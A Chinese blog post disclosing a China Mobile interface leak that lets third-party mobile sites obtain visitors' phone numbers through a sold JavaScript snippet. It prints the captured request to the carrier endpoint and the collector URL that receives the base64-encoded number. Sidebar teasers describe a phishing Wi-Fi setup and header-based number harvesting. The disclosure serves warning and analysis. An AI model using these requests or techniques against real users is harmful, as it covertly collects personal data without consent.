中国移动某接口泄漏可导致访问网站就获取用户手机号(已经发现网站利用案例)

最新推荐文章于 2024-07-25 08:00:00 发布
最新推荐文章于 2024-07-25 08:00:00 发布
阅读量2.5w 收藏 29
点赞数 4
分类专栏: 新技术

有商家在出售获取手机号:http://112.124.4.229:808/member/my.php?mid=21&status=4

手机网站加载一段他们提供的js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!

通过抓包分析可以发现:

注:抓包要用谷歌浏览器伪装成手机访问,不然抓包不到,它们屏蔽了pc!

当用户访问手机网站后,会加载一段js,js请求访问移动研究院的IP:http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D

获取到手机号之后,会把手机号通过base64加密返回给 js请求的参数q的值,如上面的:

http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz

参数corp 的值就是手机信息base64位加密后的,解密后可以发现内容为:

null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53

如果是手机访问网站的话, null 就会是你的手机号,我电脑访问的,所以没手机号

bjash
关注
专栏目录
php 获取访问手机号码_移动端网站获取访问手机号获取抓取PHP方法【源码实例】...
weixin_39645019的博客
03-09 1647
/*** 类名: mobile* 描述: 手机信息类* 其他:QQ:29295842*/class mobile{/*** 函数名称: getPhoneNumber* 函数功能: 取手机号* 输入参数: none* 函数返回值: 成功返回号码,失败返回false* 其他:QQ:29295842*/function getPhoneNumber(){if (isset($_SERVER[...
移动终端获取手机号
狂飞的博客
01-20 1819
                                               手机程序获取手机号码                                                      key words:手机程序获取手机号码,wap获取手机号, android获取手机号,mobile获取手机号,symbian获取手机号,blackberry获取手机号...
通过Swagger泄露的接口获取相应信息
最新发布
码农研究僧的博客
07-25 958
由于网站中Swagger接口存在泄露,有矛就有盾,先分析矛 (不对网站进行演示,通过个人项目进行复现)
移动互联网:如何获取用户手机号(原理)
热门推荐
许克军的专栏
06-27 1万+
移动支持2种上网模式:cmwap与cmnetCMWAP 和 CMNET 只是移动人为划分的两个GPRS接入方式。前者是为手机WAP上网而设立的,后者则主要是为PC、笔记本电脑、PDA等利用GPRS上网服务。l         cmwap应用采用的实现方式是“终端+WAP网关+WAP服务器”的模式。主要的目的是通过WAP网关完成WAP-WEB的协议转换以达到节省网络流量和兼容现有WEB应用的目的。W
J2ME获取移动手机号
知 行 合 一
01-10 2309
        J2ME本身的API是没有提供这个方法的,但是我们通过CMWAP连接的时候,通过移动的网关来获取,当然,前提是移动的网关要提供这个功能。         如果网关支持这个功能的话,我们就可以通过服务器端来获得手机号码了,以下代码可以做为测试,看看你连接的移动网关是不是支持:    public static string GetPhoneNumber(HttpRequest
云端移动巧妙获取网站访客手机号
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
10-30 4492
全面解析移动网站获取用户手机号码的技术原理和实现方式 1、我们先了解一下常规移动网络的连接方式 a) WIFI,最省钱的方式,手机wifi上网其实电信、联通、移动的移动运营平台没啥事,因为他走的路由器其实是走的传统的有线上网。所以wifi上网默认走的有线,不扣流量,也无法获得号码了 b) 常规三网访问方式 i. 中国移动APN:CMWAP(2G) CMNET(3G) ii. 中国
简单搭建钓鱼Wifi信号获取用户手机号
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
10-30 6927
如果我们附近没有CMCC信号,我们可以搭建一个免费的CMCC钓鱼Wifi信号,让别人主动来输入手机号认证获得用户手机号码,岂不更好,下面是实施计划。 准备:无线网卡(8137)、bt5、钓鱼页面 一:插入无线网卡进入BT5,把网卡启动起来,给eth0配个ip #ifconfig eth0 up #ifconfig wlan0 up #ifconfig eht0 192.16
支付宝手机网站网站截图案例
11-02
在移动互联网时代,支付宝作为国内领先的在线支付平台,其手机网站支付功能对于许多商家和用户来说至关重要。在进行支付宝手机网站支付签约时,确保网站的合法性和安全性是支付宝审核的重要环节。根据标题“支付宝...
全国手机号码极速生成-易语言
06-14
在中国,手机号码通常由11位数字组成,前三位代表网络运营商(如139、138对应中国移动,186、187对应中国联通),中间四位表示地区编码,最后四位是随机分配的个人号码。生成器需要遵循这样的规则,同时考虑到手机...
易语言-手机号归属地查询
06-29
接着,程序发送HTTP请求到指定的服务提供商,如中国移动、中国联通或中国电信的数据接口,这些接口提供了实时查询手机号归属地的能力。 服务器接收到请求后,会验证手机号码的有效性,并返回一个包含归属地信息的...
手机号码归属地数据库
02-24
例如,一个手机APP可以利用这个接口,当用户接听或拨打电话时,实时显示对方号码的归属地信息。 总的来说,手机号码归属地数据库是信息技术在通信领域的一个重要应用,它利用MDB等数据库管理系统存储和管理大量手机...
手机归属地查询(可批量查询2000个)
02-20
1. **手机号码归属地**:手机号码归属地指的是一个电话号码所属的地理位置,通常包括运营商(如中国移动、中国联通、中国电信)以及该号码注册的省份和城市。了解手机号码归属地可以帮助我们了解客户的大致区域分布...
php网页抓取浏览者手机号码_PHP 记录访客的浏览信息方法
weixin_39611389的博客
12-21 533
可以记录访客的地理位置,操作系统,浏览器,IP,时间和访问的文件。1.首先创建一个comm_function.php文件://echo $_SERVER['HTTP_USER_AGENT'];//echo "".$_SERVER ['REMOTE_ADDR'];/*** 获取客户端类型,手机还是电脑,以及相应的操作系统类型。** @param string $subject*/function g...
html5 获取本机号码,如何获取本机手机号
weixin_32486581的博客
06-08 6741
大家好,我是时间财富网智能客服时间君,上述问题将由我为大家进行解答。以华为手机为例,获取本机号码的步骤是:1、在手机上点击打开设置,进入后点击【移动网络】选项。2、点击【SIM卡管理】选项。3、进入后即可看到卡一和卡二的号码。电话号码(TelephoneNumber)是指电话管理部门为电话机设定的号码,包括固定号码和移动号码,一般由7―8位数组成(手机号码为11位),早期有过5―6位的的情况。企业...
防止浏览器将文字识别为电话号码
weixin_43448394的博客
03-29 522
前段时间在做一个搜索功能的时候,在搜索一长串数字的时候,在移动端列表的其他长串数字前会莫名加上之前搜索的长串文字
不要因为网络劫持而泄露手机号
a20405010505的博客
09-16 713
  随着网络的进步,很多信息都可以在网站进行查询,那么,自身信息的安全就显得非常重要了。如何能够更好的保护自己的信息不被各种网站劫持盗走?  IIS7网站监控  检测网站是否被劫持、域名是否被墙、DNS污染检测、网站打开速度检测等信息。  这样的,一般第三方网站用js获取手机号,主要是利用了运营商网站的csrf漏洞,包括jsonp劫持漏洞。  比如用电脑访问第三方网站的同时,不要在浏览器...
网站抓取获取手机号码原理解析
Q_1935260194的博客
04-16 2090
<?php /** * 类名: mobile * 描述: 手机信息类 * */ class mobile { /** * 函数名称: getPhoneNumber * 函数功能: 取手机号 * 输入参数: none * 函数返回值: 成功返回号码,失败返回false * */ function getPhoneNumber() { if (isset($_SERVER['HTTP_X_NETWORK_INFO'])) { $str1 = $_SERVER['...
Android手机用户隐私获取,包括读取通讯录、读取通话记录、读取浏览器历史记录、读取手机短信
码点
08-16 4184
Android手机用户隐私获取,包括读取通讯录、读取通话记录、读取浏览器历史记录、读取手机短信
请提供一份微信小程序获取用户手机号的相关条款文本
04-01
以下是一份微信小程序获取用户手机号的相关条款文本: 1. 授权说明:当您使用本小程序时,我们将获取您的手机号信息并用于提供服务。我们将严格保护您的隐私,不会将您的手机号信息用于其他目的。 2. 使用范围:我们仅在必要的情况下获取您的手机号,用于向您提供更好的服务。例如,当您需要使用需要验证手机号的功能时,我们会获取您的手机号。 3. 数据存储:我们将妥善保管您的手机号信息,不会将其泄露或提供给任何第三方。 4. 数据保护:我们将采取必要的技术和管理措施,确保您的手机号信息安全。 5. 权利声明:您有权拒绝提供您的手机号信息,但这可能会影响您使用本小程序的某些功能。 6. 法律责任:我们将遵守相关法律法规,对您的手机号信息进行保护,若因我们泄露您的手机号信息而造成您的损失,我们将承担相应的法律责任。 7. 条款变更:我们保留对本条款进行修改的权利。如有修改,我们将在本小程序上发布修改后的版本,并提示您注意查看。 请您在使用本小程序前仔细阅读并理解以上条款,如果您继续使用本小程序,即表示您同意并接受以上条款的约束。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值